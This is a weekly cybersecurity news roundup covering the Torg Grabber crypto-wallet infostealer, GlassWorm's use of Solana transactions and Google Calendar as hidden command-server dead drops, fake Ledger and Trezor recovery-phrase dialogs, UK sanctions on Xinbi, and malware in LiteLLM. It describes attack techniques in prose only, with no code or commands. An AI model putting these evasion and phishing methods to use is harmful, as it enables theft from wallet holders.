Infostealer Targets 700+ Crypto Wallets, Hackers Use Solana as Dead Drop, and UK Sanctions Xinbi

Last week brought several major cybersecurity developments: a newly discovered infostealer is targeting more than 700 browser-based crypto wallets, hackers are leveraging the Solana blockchain as a covert communication channel, and the UK government has imposed sanctions on crypto marketplace Xinbi and associated entities.

Torg Grabber: 728 Crypto Wallets and Hundreds of Extensions at Risk

Cybersecurity researchers at Gen Digital have identified a new infostealer called Torg Grabber that targets confidential data from 850 browser extensions. Among them are 728 cryptocurrency wallets — including MetaMask, Phantom, and TrustWallet — along with password managers, two-factor authentication tools, and note-taking apps.

Initial access is achieved through the ClickFix technique — attackers hijack the clipboard and trick users into executing a malicious PowerShell command. Beyond extensions, Torg Grabber harvests data from Discord, Telegram, Steam, VPN clients, email services, and desktop crypto applications.

The malware's capabilities extend well beyond extension data theft:

• Creating a digital hardware fingerprint;
• Analyzing installed software (including 24 antivirus products);
• Capturing desktop screenshots;
• Stealing files from Desktop and Documents folders;
• Executing arbitrary code on infected devices.

Since late 2025, Torg Grabber operators have transitioned to HTTPS connections via Cloudflare infrastructure and learned to bypass cookie protections in Chrome, Brave, Edge, Vivaldi, and Opera. Between December 2025 and February 2026, researchers identified 334 compiled samples, with new command-and-control servers being registered weekly.

Why This Matters

The scale of Torg Grabber's attack is unprecedented for an infostealer — virtually every popular browser-based crypto wallet is in its crosshairs. Meanwhile, the GlassWorm campaign demonstrates an evolution in hacker techniques: using blockchain to conceal command infrastructure makes it significantly harder to block. The UK sanctions against Xinbi represent one of the first instances of Western regulators directly targeting crypto infrastructure that serves fraudulent operations across Southeast Asia.

GlassWorm: Solana Blockchain as a Dead Drop

Researchers at Aikido have documented a new phase of the GlassWorm campaign. Hackers distribute poisoned code packages through npm, PyPI, GitHub, and the Open VSX marketplace, while also compromising accounts of maintainers of popular projects to push malicious updates.

The key discovery is how the C2 server address is concealed. Instead of hardcoding it into the malware (where it would be easy to find and block), attackers used a "dead drop" method via the Solana blockchain. The loader connects to the network, checks predetermined wallets, and searches for transactions containing a special text memo. From this field, it extracts a disguised link to the command server.

The second stage involves compressing stolen data — crypto wallets, system profiles — into a ZIP archive and exfiltrating it to an external server. Two additional modules are then deployed:

• Hardware wallet phishing: When a USB device is connected, a fake dialog appears — for Ledger, a fabricated configuration error with 24 fields for the recovery phrase; for Trezor, a "firmware verification failure" message with an emergency reboot prompt and identical input fields.
• JavaScript RAT: Its download URL is extracted from a Google Calendar event description (another dead drop variant). The trojan launches a hidden remote desktop module, steals browser data, and forcefully installs the Google Docs Offline extension, which collects up to 5,000 history entries, screenshots, clipboard contents, and monitors crypto exchanges such as Bybit by tracking authorization tokens and device IDs.

A notable detail: the malware does not infect systems with Russian localization.

UK Sanctions Target Xinbi and Scam Compounds

On March 26, the UK government imposed sanctions on crypto marketplace Xinbi and individuals connected to scam compounds in Southeast Asia. Authorities stated the platform facilitated the sale of stolen personal data and provided tools for targeting victims, including satellite internet equipment.

Sanctions also hit Legend Innovation, operator of #8Park — a major scam compound in Cambodia estimated to hold up to 20,000 forced laborers. Restrictions were placed on company director Eang Soklim and individuals linked to the Prince Group financial network.

According to Chainalysis, Xinbi processed transactions exceeding $19.9 billion between 2021 and 2025.

In India, authorities arrested Sunil Nellat Ramakrishnan (also known as Krish), suspected of trafficking citizens to fraudulent crypto centers in Myanmar. Victims were transported from Delhi to Bangkok under the pretense of legitimate employment, then forcibly moved to the Myawaddy area, specifically to the KK Park compound.

Cyberattack on Ignition Interlock Maker Locks Drivers Out of Cars

Intoxalock, a US-based provider of ignition interlock systems for drivers convicted of DUI offenses, suffered a cyberattack that disrupted device operations. Some users were unable to start their vehicles because the devices require monthly calibration, and the attack made verification impossible.

In Connecticut alone, the issue affected 7–10% of users. Intoxalock extended service center authorization by 10 days, though the extension didn't work for all device versions or in every state. Systems were restored on March 22, and the company pledged to reimburse affected users, including towing expenses.

Trojan Discovered in AI Tool LiteLLM

Researcher Callum McMahon of FutureSearch discovered credential-stealing malware embedded in LiteLLM, a popular AI tool that allows developers to connect to hundreds of neural networks and manage subscription payments. The project has over 40,000 GitHub stars and up to 3.4 million daily downloads.

The virus infiltrated through a compromised third-party dependency package. McMahon suspected infection when his computer suddenly shut down immediately after loading the software — a bug in the malware itself triggered a system crash, inadvertently revealing its presence. McMahon and developer Andrej Karpathy concluded the virus was likely created using vibe coding without careful review.

"Oh damn, I thought this WAS a joke… but no, LiteLLM *really* was 'Secured by Delve' (the company that rubber stamped all of these audits, and seems to have been on the edge of fraudulent auditing, but useless for sure). And so unsurprisingly LiteLLM was compromised, badly" — Gergely Orosz (@GergelyOrosz), original post

LiteLLM's website displays SOC2 and ISO 27001 certification badges issued after an audit by Delve, a company previously accused of generating fake data for reports, using questionable auditors, and misleading clients about their security posture. LiteLLM's developers managed to eliminate the threat within hours. An investigation is underway in collaboration with Mandiant.